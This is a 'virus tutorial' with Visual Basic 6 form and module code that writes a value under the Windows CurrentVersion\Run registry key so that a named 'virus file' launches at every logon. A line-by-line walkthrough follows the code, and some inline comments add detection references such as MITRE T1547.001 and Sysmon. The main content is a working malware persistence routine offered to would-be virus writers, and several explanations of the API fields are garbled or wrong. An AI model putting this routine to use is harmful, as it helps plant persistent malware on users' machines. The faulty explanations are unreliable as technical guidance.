
Virus Tutorial – INJECT THE REGISTRY WITH VISUAL BASIC

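Registry? What is that? Read the article about the Registry first, and then read this tutorial. In short, the Registry holds the settings that regulate the Windows system; you can think of it as the computer's heart. Windows starts every program listed under the Run keys at logon, which is also why antivirus tools and incident responders routinely check these keys. To trigger the virus file automatically, we must add a value under this key: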

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

Or in:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\

How to do it? Follow these steps:

  1. Make a project with one form and one button
  2. Copy the source code below to the appropriate place: if it is module source code, copy it to the module; if it is form source code, copy it to the form.

‘//////////////////////////BEGINNING OF FORM CODE////////////////////////////////////////
' Click handler for the form's button. It opens the current user's Run key and
' writes one REG_SZ value named "teserror" whose data is the path held in nilai.
' Windows launches the programs listed under this key at user logon, so an
' unexpected value here is a classic persistence indicator (MITRE ATT&CK T1547.001).
' Detection: the write appears as a registry value-set event (for example Sysmon
' Event ID 13) on ...\CurrentVersion\Run, and the entry is listed by Sysinternals Autoruns.
Private Sub Command1_Click()
Dim newopen As Long ' never used in this routine
Dim secattr As SECURITY_ATTRIBUTES
Dim hKey, hkeyb As Long ' hkeyb is never used in this routine
Dim retval As Long ' receives each API return code; never inspected below
Dim nilai As String ' "nilai" = value: the data written to the Run entry
Dim nl_angka As Long
Dim subkey As String

' secattr is filled in here but is not passed to any call in this routine
' (only the RegCreateKeyEx declaration takes a SECURITY_ATTRIBUTES argument).
secattr.lpSecurityDescriptor = 0
secattr.bInheritHandle = True
secattr.nLength = Len(secattr)

' Data for the Run entry: the full path of the executable to be started at logon.
nilai = “c:\windows\tes.exe”
nl_angka = 1 ' assigned but not read anywhere in this routine
subkey = “Software\Microsoft\Windows\CurrentVersion\Run\”

' Open HKEY_CURRENT_USER\<subkey> with KEY_WRITE access; the handle comes back in hKey.
' The per-user hive is normally writable by the logged-on user without administrator
' rights, which is why per-user Run entries deserve the same monitoring as HKLM ones.
retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hKey)
' Set the string value "teserror" to the path in nilai.
retval = RegSetValueEx(hKey, “teserror”, 0, REG_SZ, nilai, Len(nilai))
' Release the key handle. NOTE(review): retval is overwritten by every call and never
' checked, so a failed open or write goes unnoticed by this code.
retval = RegCloseKey(hKey)
End Sub
‘///////////////////////END OF FORM CODE////////////////////////////////////

‘//////////////////////////////////BEGINNING OF MODULE CODE//////////////////////////////
' VB6 declaration of the Win32 SECURITY_ATTRIBUTES structure.
' In this module only the RegCreateKeyEx declaration takes it as a parameter.
Public Type SECURITY_ATTRIBUTES
nLength As Long ' size of this structure in bytes (the form code sets it with Len)
lpSecurityDescriptor As Long ' pointer to a security descriptor; the form code sets 0
bInheritHandle As Long ' non-zero if the handle should be inheritable by child processes
End Type

' Predefined registry root-key handles. The form code uses only HKEY_CURRENT_USER.
Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_DYN_DATA = &H80000006
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_PERFORMANCE_DATA = &H80000004
Public Const HKEY_USERS = &H80000003

' Access-right masks for the samDesired argument. The form code requests KEY_WRITE only.
' KEY_EXECUTE and KEY_READ carry the same value in this list.
Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H20006

' Registry value types for the dwType argument, except REG_CREATED_NEW_KEY, which is a
' disposition code reported by RegCreateKeyEx. The form code uses only REG_SZ.
Public Const REG_CREATED_NEW_KEY = &H1
Public Const REG_DWORD_BIG_ENDIAN = 5
Public Const REG_DWORD_LITTLE_ENDIAN = 4
Public Const REG_DWORD = 4
Public Const REG_EXPAND_SZ = 2
Public Const REG_LINK = 6
Public Const REG_MULTI_SZ = 7
Public Const REG_NONE = 0
Public Const REG_RESOURCE_LIST = 8
Public Const REG_SZ = 1
Public Const REG_BINARY = 3

' Win32 registry API imports from advapi32.dll. Every alias binds the ANSI ("A") entry point.
' Each function returns a Long status code that the caller is expected to check.

' Opens an existing subkey under hKey; the opened handle is returned through phkResult.
Public Declare Function RegOpenKeyEx Lib “advapi32.dll” Alias _
“RegOpenKeyExA” (ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
' Closes a handle obtained from RegOpenKeyEx or RegCreateKeyEx.
Public Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey As Long) As Long
' Creates a subkey, or opens it if it already exists. Declared here but not called by the form code.
Public Declare Function RegCreateKeyEx Lib “advapi32.dll” Alias _
“RegCreateKeyExA” (ByVal hKey As Long, ByVal lpSubKey As String, _
ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions _
As Long, ByVal samDesired As Long, lpSecurityAttributes As SECURITY_ATTRIBUTES, _
phkResult As Long, lpdwDisposition As Long) As Long
' Older API that sets the default value of a subkey. Declared here but not called by the form code.
Public Declare Function RegSetValue Lib “advapi32.dll” Alias _
“RegSetValueA” (ByVal hKey As Long, ByVal lpSubKey As String, ByVal _
dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
' Sets a named value under an open key; this is the call the form code uses for the Run entry.
' Written without the Public keyword, unlike the declarations above.
Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” _
(ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, _
ByVal dwType As Long, lpData As String, ByVal cbData As Long) As Long

‘//////////////////////////////////END OF MODULE CODE/////////////////////////////

In this sub-chapter I will explain a little about coding against the Windows Registry. I may not cover everything in full, but at least you will understand the basics.

Private Sub Command1_Click()
– The beginning of sub.

Dim newopen As Long
– Define the Newopen Variable with LongInteger kind.

Dim secattr As SECURITY_ATTRIBUTES
– Define the secattr variable with the SECURITY_ATTRIBUTES type; this type is defined in the module source code.

Dim hKey, hkeyb As Long
– Define the hKey  and  hkeyb variable with  Long Integer kind.

Dim retval As Long
– Define the retval variable with Long Integer kind.

Dim nilai As String
– Define the nilai ("value") variable as a String.

Dim subkey As String
– Define the subkey variable as a String.

secattr.lpSecurityDescriptor = 0
– Give value to secattr.lpSecurityDescriptor with 0, it useful to change the registry.

secattr.bInheritHandle = True
– Set secattr.bInheritHandle to True, which is useful so that the registry handle can be changed and regenerated by the registry on another system.

secattr.nLength = Len(secattr)
– Give value to secattr.nLength with total value from that registry.

nilai = “c:\windows\tes.exe”
– Give variable value with “c:\windows\tes.exe” , useful to  call the virus file, can be loaded appropriate with location and name of the virus that you want to run.

subkey = “Software\Microsoft\Windows\CurrentVersion\Run\”
– Set the subkey variable to “Software\Microsoft\Windows\CurrentVersion\Run\”; this is the registry key that you want to open.

retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hKey)
– Give retval value with RegOpenKeyEx function (HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hKey) , useful to open the registry key that you want to give the value.

retval = RegSetValueEx(hKey, “teserror”, 0, REG_SZ, nilai, Len(nilai))
– Give retval value with RegSetValueEx function (hKey, “teserror”, 0, REG_SZ, nilai, Len(nilai)) , useful to give registry key value that is “teserror”.

retval = RegCloseKey(hKey)
– Close the registry key.

End Sub
– The end of the sub.

How to run:

  1. Compile the source code using Visual Basic.
  2. Run it and look at the registry key. Does the value appear?
  3. If there is an error, just read the next tutorial. Thank you.
